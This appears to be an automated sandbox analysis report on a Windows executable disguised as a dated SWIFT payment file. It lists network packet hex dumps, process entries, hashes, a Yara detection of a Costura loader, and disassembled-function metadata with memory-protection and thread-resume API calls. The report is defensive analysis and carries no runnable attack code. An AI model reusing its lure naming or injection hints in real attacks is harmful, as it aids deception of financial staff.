Dec 10, 2024 13:11:54.257689953 CET	1236	IN	Data Raw: 31 38 ea b8 1a 47 6f cd d1 9f 01 f9 ab a5 43 45 58 f0 be 33 51 4b 3b c5 7f 24 5b d5 c0 4f db 53 4b aa 9e 8c 26 50 57 5c c7 31 e8 56 5f fa 59 4e 9a 9f ee 2d f8 14 ef b0 a6 09 d0 c4 0e 3f fa 61 9f 52 8c 82 55 01 22 40 51 c5 44 52 d3 92 f9 98 65 cb Data Ascii: 18GoCEX3QK;$[OSK&PW\1V_YN-?aRU"@QDReU6mC^UtR2Azoo<rca80b(;!%$YT]&yXx*pnAyvk<\b$.?Ul-=./89jLi`]kNkZGfxi?DBV
Dec 10, 2024 13:11:54.257759094 CET	1236	IN	Data Raw: c4 21 70 ec 9d 6e 34 a4 47 b1 55 6a 8f 4d b9 46 c7 3a d1 08 11 a1 48 53 a5 d4 c9 64 c9 fc 4a 8b f2 0a 20 85 ad 11 b0 29 4f 36 5a 93 24 ac a2 95 35 b4 9a a7 17 08 12 95 7e a0 9d 35 4f 25 25 7f a1 30 78 a1 bd 68 77 33 36 e0 3e 15 e1 84 f1 5c 8a e2 Data Ascii: !pn4GUjMF:HSdJ )O6Z$5~5O%%0xhw36>\CVgga^EPr#Q-&;77+B\\|dY{j{@KeK%E-;kQ%Ip#9^6P{L/^
Dec 10, 2024 13:11:54.257786989 CET	1236	IN	Data Raw: 53 aa 31 bf b1 0b 59 7d 16 68 30 38 b5 90 a6 d9 8c 90 b9 97 2a 19 3d 59 d0 dd 73 3c 4d e0 0c d6 0c 5b a9 44 51 82 2a 22 49 79 90 ce 61 ff 6c 8c da a2 f9 c5 ad 29 6b 78 59 b4 6c 79 27 29 b8 4a 45 be e0 af 38 02 b6 8a 6c c3 a4 16 bf 09 32 5b 89 c0 Data Ascii: S1Y}h08=Ys<M[DQ"Iyal)kxYly')JE8l2[[X9/OfRUl!ydd:c-y0ARyq^O`F)SN+9^s(OyH\|VuRTj8#/
Dec 10, 2024 13:11:54.257805109 CET	1236	IN	Data Raw: 9a c1 2e f5 47 1a 2e 9d 81 50 a6 2e 99 ef 7a c9 d4 5f 52 51 c2 9f 17 f3 46 96 57 9e dc 23 58 86 fd 83 0b 14 32 ac c9 04 fe d6 68 01 b9 74 6c c3 87 bb 9c 96 09 c7 7a a6 72 68 6a 91 dd 01 09 ec 1b 23 d8 af 5c 57 1e ec e6 64 63 2d 08 1c ff 79 57 9c Data Ascii: .G.P.z_RQFW#X2htlzrhj#\Wdc-yWpc~&A,a`iIgG?PGwIhdJWu5'vEijnSuBr~-2,.D_bnNb{=4nN!Mk=;QOFWp*(k`8A
Dec 10, 2024 13:11:54.257817030 CET	1236	IN	Data Raw: 8e 74 5c 4e 0f a5 cf e6 84 3e a2 af 7e e6 dc 82 25 9f 23 fe 57 4f 45 d4 19 57 09 68 c9 76 70 cc 75 05 87 d7 f4 68 00 3e 2d 1b 0c 77 67 f7 43 1e ff 0a 0b d4 2f 7f 8e 22 1c d3 6b 35 b8 d0 58 e1 ae ff 52 bb 20 57 01 e2 b3 c7 35 0e a4 99 47 84 6a 27 Data Ascii: t\N>~%#WOEWhvpuh>-wgC/"k5XR W5Gj',HGH'v_vj&G>q^Xtx8CXA7BRqxnm/^!Dg@E((sS~cIV7{_J9%%l<,w)0(8XM
Dec 10, 2024 13:11:54.258115053 CET	1236	IN	Data Raw: 4c b3 30 b9 e2 91 7b 21 72 2e 71 de 67 51 7f 46 90 cd 89 97 3c 39 57 c6 75 1b 1b 8d ff e4 19 ce 89 4e 89 e4 44 66 97 e1 ba 91 c4 8f 60 b8 48 4b 93 6c 62 e7 fb 47 72 5e 4a 7d f7 a3 92 d6 e2 42 51 bc de a8 80 80 2b f0 ad 02 77 6f f0 b0 29 95 27 c3 Data Ascii: L0{!r.qgQF<9WuNDf`HKlbGr^J}BQ+wo)'s(bc3?stSk,;qFaw}hr$[k?WVLLABrVnXwY!P(L0TI==l"-Bz/-}8,Zx
Dec 10, 2024 13:11:54.258168936 CET	1236	IN	Data Raw: 5d d2 80 8e 48 37 fb f7 4e 21 a1 68 6a 99 fa a3 e8 f3 d2 d5 81 38 8f 88 19 5e 7f a0 ba 4d 1a 9e 7f 60 0c 08 37 be c3 6a 42 81 8e f4 53 3c 2c 25 aa ff b3 7e 89 79 01 1b 51 1b 9c 83 11 16 04 4c c1 9b 6d c3 e2 95 38 93 96 66 64 ae 6e ba 38 8f 7d 42 Data Ascii: ]H7N!hj8^M`7jBS<,%~yQLm8fdn8}B}GSRWwKB\F1eJl5:[LRFf_e"RT&CDp@pRN\|B?Nr~VN#ycQ*;PA NuGP~`
Dec 10, 2024 13:11:54.376890898 CET	1236	IN	Data Raw: 9d 83 f2 55 e0 0e 2c a8 50 1d 75 da 47 45 d5 90 32 ac f1 77 74 69 b7 de 9f 55 e6 85 5d 49 60 6c 63 3f 9f 6c d0 27 25 1c ae 1d 84 8a 31 87 89 7c 34 aa 5c 6d 7b b4 78 77 29 b2 d9 20 24 e9 a7 5d 18 c6 a1 a5 76 df 08 1b 88 dd a1 51 cb 04 08 1c f1 83 Data Ascii: U,PuGE2wtiU]I`lc?l'%1\|4\m{xw) $]vQ033-+\|- 9f'PdB<8Zs=lMDW-#UJ y3wR,9}V`(LvGBU9h\|AZPq<p?Z7&gD-`dp

Target ID:	0
Start time:	07:11:51
Start date:	10/12/2024
Path:	C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe"
Imagebase:	0xc30000
File size:	186'952 bytes
MD5 hash:	1FBBB69B38CBD11F090850B982EDC780
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2341292549.00000000060D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2320521719.00000000030C7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	07:12:21
Start date:	10/12/2024
Path:	C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe"
Imagebase:	0x440000
File size:	186'952 bytes
MD5 hash:	1FBBB69B38CBD11F090850B982EDC780
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	07:12:22
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5280 -s 1172
Imagebase:	0x40000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	10.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	3.1%
Total number of Nodes:	195
Total number of Limit Nodes:	8

Executed Functions

Function 060B44E0 Relevance: 16.1, Strings: 12, Instructions: 1103COMMON

Download Yara Rule

Strings

$p, xrefs: 060B4927
$p, xrefs: 060B4763
$p, xrefs: 060B4E1A
,p, xrefs: 060B4F9A
$p, xrefs: 060B4E0A
4, xrefs: 060B4EB5
$p, xrefs: 060B49E7
$p, xrefs: 060B4937
$p, xrefs: 060B49D7
$p, xrefs: 060B4DC1
$p, xrefs: 060B4773
$p, xrefs: 060B4DB1

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: ,p$4$$p$$p$$p$$p$$p$$p$$p$$p$$p$$p
API String ID: 0-142193208
Opcode ID: 853d5e9ef6cca25eb4a93ec58569327faefcb675dd058e6a75241106ed6b405f
Instruction ID: c2b1763df98918df11b9a9fd0e3205f394e85484f9cab387a3ceb4ca10c841ac
Opcode Fuzzy Hash: 853d5e9ef6cca25eb4a93ec58569327faefcb675dd058e6a75241106ed6b405f
Instruction Fuzzy Hash: 76B2F974A402188FDBA4CF94C994BADBBF6FF88700F1581A9E505AB3A5CB749D81CF50

Function 060B4807 Relevance: 8.0, Strings: 6, Instructions: 495COMMON

Download Yara Rule

Strings

$p, xrefs: 060B4927
,p, xrefs: 060B4F9A
$p, xrefs: 060B4E0A
4, xrefs: 060B4EB5
$p, xrefs: 060B49D7
$p, xrefs: 060B4DB1

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: ,p$4$$p$$p$$p$$p
API String ID: 0-3956653638
Opcode ID: ef518014286039b64f344e5e63333341bbe113f7ded2de752326b96655538ccd
Instruction ID: be83301a4dcf95d699c6483878d5ffc04e67bf651c9070decf47c84c752ab13f
Opcode Fuzzy Hash: ef518014286039b64f344e5e63333341bbe113f7ded2de752326b96655538ccd
Instruction Fuzzy Hash: F322E674A402158FDBA4CF64C984BADBBF2FF88301F1491A9D509AB3A5DB74AD81CF50

Function 061AE2F0 Relevance: 3.1, Strings: 2, Instructions: 618
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fp, xrefs: 061AE41D
8, xrefs: 061AE40A

Memory Dump Source

Source File: 00000000.00000002.2341620124.00000000061A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61a0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: fp$8
API String ID: 0-1672762717
Opcode ID: acd20aee845e1e4bd14839ed761b58d5d04dcae209f4cf8d0dc5135c31dbb20f
Instruction ID: 3c0d7b4c135299a6e71c7d4b7b33eebfaaf1e4094e13fd1c1b85973477adc245
Opcode Fuzzy Hash: acd20aee845e1e4bd14839ed761b58d5d04dcae209f4cf8d0dc5135c31dbb20f
Instruction Fuzzy Hash: 3452D575E112298FDB64DF69CD50AD9B7B1FB89300F1082AAD909B7350DB34AE81CF90

Function 060B0006 Relevance: 3.0, Strings: 2, Instructions: 464
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Tep, xrefs: 060B03F3
L-., xrefs: 060B01BC

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: L-.$Tep
API String ID: 0-2356511334
Opcode ID: fdd1118de80b562d9b3c4a095660ddc710cf7629a6d893574beeca2d7de093f0
Instruction ID: 025f304f84ff12c6cc31a3d058137a3a3e3793f151ae5e6b0108af2277d780a8
Opcode Fuzzy Hash: fdd1118de80b562d9b3c4a095660ddc710cf7629a6d893574beeca2d7de093f0
Instruction Fuzzy Hash: 8122E6B4A51218CFEB64CF68D844BAEBBF2FF89300F1490A9C50AA7255DB785D85CF50

Function 060B0040 Relevance: 2.9, Strings: 2, Instructions: 448
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Tep, xrefs: 060B03F3
L-., xrefs: 060B01BC

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: L-.$Tep
API String ID: 0-2356511334
Opcode ID: e8fc0440486fafb5dd536decff4f5b2362816985a4b6876fac7fc1916e770f4e
Instruction ID: 29657794f7536e3af1863d215366d7e495c6628d3bae62ddba623fd78c8a7306
Opcode Fuzzy Hash: e8fc0440486fafb5dd536decff4f5b2362816985a4b6876fac7fc1916e770f4e
Instruction Fuzzy Hash: BF12E4B4A55218CFEBA4CF58D844BEEBBF2FB89300F1090A9C50AA7255DB785D85CF50

Function 060C7878 Relevance: 2.7, Strings: 2, Instructions: 242
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Tep, xrefs: 060C7A3A
A0O?, xrefs: 060C7995

Memory Dump Source

Source File: 00000000.00000002.2341251767.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: A0O?$Tep
API String ID: 0-4114325029
Opcode ID: a3f66698d89456f4db85f8d0a3956eaddba8fcf6617bec5f8ad14e31693aa194
Instruction ID: 45f3e64778b02447c4ba34736c4f1fb890e8bebfc406ab022e8cbc16a7ef8f1b
Opcode Fuzzy Hash: a3f66698d89456f4db85f8d0a3956eaddba8fcf6617bec5f8ad14e31693aa194
Instruction Fuzzy Hash: 41A1F474E45208CFEB94CFA9D984BADBBF2FF89310F20906AD509A7251DB349985CF40

Function 061AE2E0 Relevance: 2.7, Strings: 2, Instructions: 176
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

h, xrefs: 061AE3FE
fp, xrefs: 061AE41D

Memory Dump Source

Source File: 00000000.00000002.2341620124.00000000061A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61a0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: fp$h
API String ID: 0-148833449
Opcode ID: a4b4c9ce1359d8bec7fe85787a542e65bee3464f6932c9f5d899ae7e68c7fb77
Instruction ID: 37fd5bd72a7e6eb4d8e2a78a132467f03dfde4383f3b1e0def56ab3ece9c5b54
Opcode Fuzzy Hash: a4b4c9ce1359d8bec7fe85787a542e65bee3464f6932c9f5d899ae7e68c7fb77
Instruction Fuzzy Hash: 2A711474E006299FEB64DF69D850BD9B7B2FF89300F5082AAD909B7250DB345E85CF90

Function 062611D0 Relevance: 1.6, APIs: 1, Instructions: 105nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06261285

Memory Dump Source

Source File: 00000000.00000002.2341981609.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: true

Associated: 00000000.00000002.2341848379.0000000006210000.00000004.08000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6210000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 9ae5c8255d36cc047a2aad055d9f125644ee12405b627744c103d664995ee096
Instruction ID: 6893081453e953e75946fd48623ae7e6ec61044274f3c37b21a4a8c8854ca84b
Opcode Fuzzy Hash: 9ae5c8255d36cc047a2aad055d9f125644ee12405b627744c103d664995ee096
Instruction Fuzzy Hash: 4C4197B4D002589FCF10CFAAD984AEEFBB1BF49310F10A42AE815B7200D735A946CF64

Function 062636B0 Relevance: 1.6, APIs: 1, Instructions: 82nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 0626373E

Memory Dump Source

Source File: 00000000.00000002.2341981609.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: true

Associated: 00000000.00000002.2341848379.0000000006210000.00000004.08000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6210000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 84756d6a025e133b831bffbd60148508400fd10919f99d28d9d06ec07c04c75e
Instruction ID: 4a8c90737015cf33b2fe5dad543c7954f75e44516fc6673b6c87200dac41a089
Opcode Fuzzy Hash: 84756d6a025e133b831bffbd60148508400fd10919f99d28d9d06ec07c04c75e
Instruction Fuzzy Hash: 7731AAB4D012189FCB10CFAAD980AAEFBF5BB49310F10942AE815B7200C775A946CF94

Function 06349E80 Relevance: 1.6, Strings: 1, Instructions: 311COMMON

Download Yara Rule

Strings

PHp, xrefs: 0634A22D

Memory Dump Source

Source File: 00000000.00000002.2342191199.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6340000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: PHp
API String ID: 0-2495607638
Opcode ID: cbb95d2b5e008bb35f2940182222c2722644b6125bd26636f1b0a29a6ae378d9
Instruction ID: e75925fca3a8c0fda76d501aeecdbe6c312760d92bff1381ff3e139415142637
Opcode Fuzzy Hash: cbb95d2b5e008bb35f2940182222c2722644b6125bd26636f1b0a29a6ae378d9
Instruction Fuzzy Hash: 3BD115B4E45208CFEB54DFA5D984BAEFBF6FB89300F1090A9D509A7244DB346985CF81

Function 06349E6F Relevance: 1.6, Strings: 1, Instructions: 307COMMON

Download Yara Rule

Strings

PHp, xrefs: 0634A22D

Memory Dump Source

Source File: 00000000.00000002.2342191199.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6340000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: PHp
API String ID: 0-2495607638
Opcode ID: 36879e7396ce9060028f1a7d187e677ceb11fce215837de579cde287ca7b00d0
Instruction ID: 9f8526fc7e0f55a753b613cd6e7a35cb091953095c6d54d8bcefb2012238d8db
Opcode Fuzzy Hash: 36879e7396ce9060028f1a7d187e677ceb11fce215837de579cde287ca7b00d0
Instruction Fuzzy Hash: 60D106B4E55208CFEB54DFA5D984BAEFBF2FB89300F1080A9D509A7244DB746985CF81

Function 064BEFD8 Relevance: 1.5, Strings: 1, Instructions: 276COMMON

Download Yara Rule

Strings

Dp, xrefs: 064BF0DD

Memory Dump Source

Source File: 00000000.00000002.2342275454.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64a0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: Dp
API String ID: 0-2141643023
Opcode ID: 37a304e927cde59572f26f8f724121675132f2f6d7d89c448cd320b4b9bb822e
Instruction ID: 039a455c1715f2a27f114326a4a1ea96e4c4290c0a1cf129b5c8fc9a969f9031
Opcode Fuzzy Hash: 37a304e927cde59572f26f8f724121675132f2f6d7d89c448cd320b4b9bb822e
Instruction Fuzzy Hash: 0CD1A2B4A01219CFDB54DFA9D990B9DBBB2FF88300F1080A9D509AB365DB359D85CF50

Function 061A9120 Relevance: .3, Instructions: 286COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341620124.00000000061A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61a0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eeb89bd776e6d56bb95196ad9ccee34b59287447fa75061e920b296b8c3d1730
Instruction ID: f3a41de358b63cfb81e0646dc0ab956091af4f07831f70839bd87fa7a2c31c24
Opcode Fuzzy Hash: eeb89bd776e6d56bb95196ad9ccee34b59287447fa75061e920b296b8c3d1730
Instruction Fuzzy Hash: 35D106B8E25218CFEB94DF69D984BADB7F6FB89300F1094AAD509A7250DB345D81CF40

Function 061A91A7 Relevance: .3, Instructions: 283COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341620124.00000000061A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61a0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cf555d8db82841691268853d5c2994f2012ea3dc9def964601b16e4c78c8f6b
Instruction ID: 8234f4487147ed60098f5c03c05042727db96507a60f73397df272d7081fcc8d
Opcode Fuzzy Hash: 8cf555d8db82841691268853d5c2994f2012ea3dc9def964601b16e4c78c8f6b
Instruction Fuzzy Hash: F5D1E4B8E25218CFEB94DF69D984BADB7F2FB89300F1084AAD509A7254DB345D85CF40

Function 061A6270 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341620124.00000000061A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61a0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34cb68d510909d1af3228ae25d116f5a669ed619e448403b73789813dd9900f7
Instruction ID: 34d778ae43d15f1f2d6c2a51c9d0d218964db19f24e08cb8275c10de74ea52c2
Opcode Fuzzy Hash: 34cb68d510909d1af3228ae25d116f5a669ed619e448403b73789813dd9900f7
Instruction Fuzzy Hash: 81C1E2B8E15218CFEB54CFA9D954AADBBF2FF89300F148069D409A7354DB385946CF90

Function 061A6280 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341620124.00000000061A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61a0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6ad1d42fcb73ad7e76b08d1c6ea6d6cd857e739983ac1f301e17980ad84327f
Instruction ID: e3c12a4742b51f3c9cc6f7d0336cfcbaa1fe01171acda0c99336374b64a8de59
Opcode Fuzzy Hash: e6ad1d42fcb73ad7e76b08d1c6ea6d6cd857e739983ac1f301e17980ad84327f
Instruction Fuzzy Hash: 14B1D1B8E15218CFEB58CFA9D954AADBBF2FF89300F148069D409A7355DB385946CF80

Function 060BB8B0 Relevance: 7.7, Strings: 6, Instructions: 154
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'p, xrefs: 060BB964
4'p, xrefs: 060BB982
pp, xrefs: 060BBA07
(p, xrefs: 060BBA7A
4'p, xrefs: 060BB9FA
4'p, xrefs: 060BB934

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: (p$4'p$4'p$4'p$4'p$pp
API String ID: 0-2991777393
Opcode ID: 37902f2ca6825900ff670a79551c00c1b0bbd3795eaa557bfc7a33b9be63b8a0
Instruction ID: 7a203a7588956a30a15e6655f4d03d17bbf7e33625f6ba71b6df7ffdfb287663
Opcode Fuzzy Hash: 37902f2ca6825900ff670a79551c00c1b0bbd3795eaa557bfc7a33b9be63b8a0
Instruction Fuzzy Hash: 3A51A170A443058FC758DB78C8507AEBBE6EFC8300F14886DC5469B395DE75AE0587A1

Function 060BA5F0 Relevance: 4.2, Strings: 3, Instructions: 478
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hp, xrefs: 060BAB44
Hp, xrefs: 060BAAC5
Hp, xrefs: 060BAAF4

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: Hp$Hp$Hp
API String ID: 0-3665545250
Opcode ID: 3ff31cad919098fe6694b3bfcca8166680d636802a11c5a49fa539add8fa0eae
Instruction ID: a0fa912fd198b8ff2be56a9d6cc01fa7ddc904cebab74a585575181050b87d26
Opcode Fuzzy Hash: 3ff31cad919098fe6694b3bfcca8166680d636802a11c5a49fa539add8fa0eae
Instruction Fuzzy Hash: 46124C70B402058FDBA4DFA4C884AAEBBF2FF88300F248529D5469B754DB75ED46CB90

Function 060BC2A8 Relevance: 4.1, Strings: 3, Instructions: 370
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'p, xrefs: 060BC4C2
4'p, xrefs: 060BC621
4'p, xrefs: 060BC5A1

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: 4'p$4'p$4'p
API String ID: 0-3087666796
Opcode ID: e73846193b0969f4a25674978a76c75a2c56c51ebef7633bc8785706d36a0760
Instruction ID: 24d8836aeb1a431e59be71321e9a127d178b902ac5f7816d949a9c407a741b65
Opcode Fuzzy Hash: e73846193b0969f4a25674978a76c75a2c56c51ebef7633bc8785706d36a0760
Instruction Fuzzy Hash: DBF1F934A50219CFDB58DFA4D998E9DBBB2FF88300F118159E906AB365DB75EC42CB40

Function 05FD1EA8 Relevance: 3.1, Strings: 2, Instructions: 577COMMON

Download Yara Rule

Strings

4'p, xrefs: 05FD2659
4'p, xrefs: 05FD2669

Memory Dump Source

Source File: 00000000.00000002.2340924209.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5fd0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: 4'p$4'p
API String ID: 0-3973980265
Opcode ID: b9cbd7b1b53529f4a6b4bd3299d46bd5edb70f8a181b867a48955fa5b9d176e1
Instruction ID: 335c5c1e53c5f9621d9493ea384bc6f3c30a874f0654c795eeb5ef24b9a038ff
Opcode Fuzzy Hash: b9cbd7b1b53529f4a6b4bd3299d46bd5edb70f8a181b867a48955fa5b9d176e1
Instruction Fuzzy Hash: FC42C338E4421ACFDB54CB98C448ABEFBB7FF89301F148059DA1667254CB389942CFA1

Function 060B6B08 Relevance: 3.0, Strings: 2, Instructions: 516
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$p, xrefs: 060B6E83
$p, xrefs: 060B6E73

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: $p$$p
API String ID: 0-580715581
Opcode ID: 06f7e45249b136992bc688647cba2e971afeab4850eaa60b69d9680a830c2591
Instruction ID: 6ec7fab88ee73c498eb0ef0314776c19002379885f3525b96b826ae95d52b924
Opcode Fuzzy Hash: 06f7e45249b136992bc688647cba2e971afeab4850eaa60b69d9680a830c2591
Instruction Fuzzy Hash: CD224A74E502198FCB55CFA4D954AEDBBB2FF88300F248065E911A7294DB39AD46CB90

Function 05FD29D0 Relevance: 2.9, Strings: 2, Instructions: 362
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'p, xrefs: 05FD2E76
4'p, xrefs: 05FD2E66

Memory Dump Source

Source File: 00000000.00000002.2340924209.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5fd0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: 4'p$4'p
API String ID: 0-3973980265
Opcode ID: f6fd4dd16ced075abb851ab9808cfba1e075100679d2704b39b5f8fafcaf4ede
Instruction ID: b4b3491a6374a18c15d9a732a87dc7488a265b1f3094253b89257390bd2d8e91
Opcode Fuzzy Hash: f6fd4dd16ced075abb851ab9808cfba1e075100679d2704b39b5f8fafcaf4ede
Instruction Fuzzy Hash: 40F1D238D05219DFCB68DFA4E9846ACFBB3FF49311F244169E506A7250DB395982CF90

Function 060B9CA0 Relevance: 2.9, Strings: 2, Instructions: 351
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 060B9F01
(p, xrefs: 060B9CB4

Memory Dump Source

